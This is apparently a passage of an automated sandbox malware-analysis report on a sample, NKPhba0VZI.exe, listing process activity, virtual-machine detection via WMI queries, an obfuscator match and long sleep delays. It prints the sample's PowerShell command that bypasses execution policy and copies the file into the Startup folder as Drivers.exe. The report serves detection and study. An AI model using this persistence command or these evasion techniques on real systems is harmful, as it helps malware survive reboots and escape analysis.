                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Yara detected Beds ObfuscatorShow sources
                      Source: Yara matchFile source: 0000000A.00000002.301353554.0000000005100000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.213095995.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NKPhba0VZI.exe PID: 6112, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 6520, type: MEMORY
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.56b0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.4125d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3b9f940.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.5100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3c05d70.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.4125d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3b9f940.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3c05d70.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.40bf940.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.56b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.5100000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.40bf940.4.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2528
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 373
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWindow / User API: threadDelayed 5577
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWindow / User API: threadDelayed 4199
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5293
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1912
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWindow / User API: threadDelayed 3617
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWindow / User API: threadDelayed 6183
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6116Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5872Thread sleep count: 2528 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5872Thread sleep count: 373 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep count: 48 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6056Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6060Thread sleep count: 5577 > 30
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6060Thread sleep count: 4199 > 30
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6056Thread sleep count: 35 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6560Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep count: 5293 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6908Thread sleep count: 1912 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep count: 42 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6404Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6408Thread sleep time: -23980767295822402s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6412Thread sleep count: 3617 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6412Thread sleep count: 6183 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6408Thread sleep count: 44 > 30
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: powershell.exe, 00000002.00000002.268373167.0000000004752000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                      Source: NKPhba0VZI.exe, 00000005.00000002.472580653.0000000000FC1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllws\system32;C:\Windows;C:\Windows\Syrr
                      Source: powershell.exe, 00000002.00000002.268373167.0000000004752000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D07880 LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Bypasses PowerShell execution policyShow sources
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess created: C:\Users\user\Desktop\NKPhba0VZI.exe C:\Users\user\Desktop\NKPhba0VZI.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                      Source: NKPhba0VZI.exe, 00000005.00000002.473807628.00000000016D0000.00000002.00000001.sdmp, Drivers.exe, 00000014.00000002.472360748.00000000017B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: NKPhba0VZI.exe, 00000005.00000002.473807628.00000000016D0000.00000002.00000001.sdmp, Drivers.exe, 00000014.00000002.472360748.00000000017B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: NKPhba0VZI.exe, 00000005.00000002.473807628.00000000016D0000.00000002.00000001.sdmp, Drivers.exe, 00000014.00000002.472360748.00000000017B0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: NKPhba0VZI.exe, 00000005.00000002.473807628.00000000016D0000.00000002.00000001.sdmp, Drivers.exe, 00000014.00000002.472360748.00000000017B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Users\user\Desktop\NKPhba0VZI.exe VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
